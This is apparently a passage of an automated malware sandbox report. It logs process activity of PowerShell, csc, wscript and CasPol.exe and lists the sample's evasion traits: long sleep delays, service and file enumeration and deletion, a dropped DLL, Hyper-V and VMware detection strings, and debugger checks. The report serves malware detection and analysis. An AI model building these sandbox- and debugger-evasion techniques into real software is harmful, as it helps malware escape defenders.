                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198C2
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7043Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2534Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4537Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5186Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9300Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 1771Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7932Thread sleep count: 7043 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep count: 2534 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7984Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7528Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6292Thread sleep count: 250 > 30Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6292Thread sleep time: -125000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5492Thread sleep count: 187 > 30Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5492Thread sleep time: -561000s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5492Thread sleep count: 9300 > 30Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5492Thread sleep time: -27900000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044D5E9 FindFirstFileExA,12_2_0044D5E9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000004A68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000004A68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                          Source: powershell.exe, 00000003.00000002.1513173387.0000000008035000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1513173387.00000000080BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: wscript.exe, 00000007.00000003.1492026878.0000000005755000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: powershell.exe, 00000003.00000002.1506870890.0000000004A68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                          Source: powershell.exe, 00000008.00000002.1820437379.0000000007C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: CasPol.exe, 0000000C.00000002.3841776803.0000000001028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI call chain: ExitProcess graph end nodegraph_12-47919
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043A65D
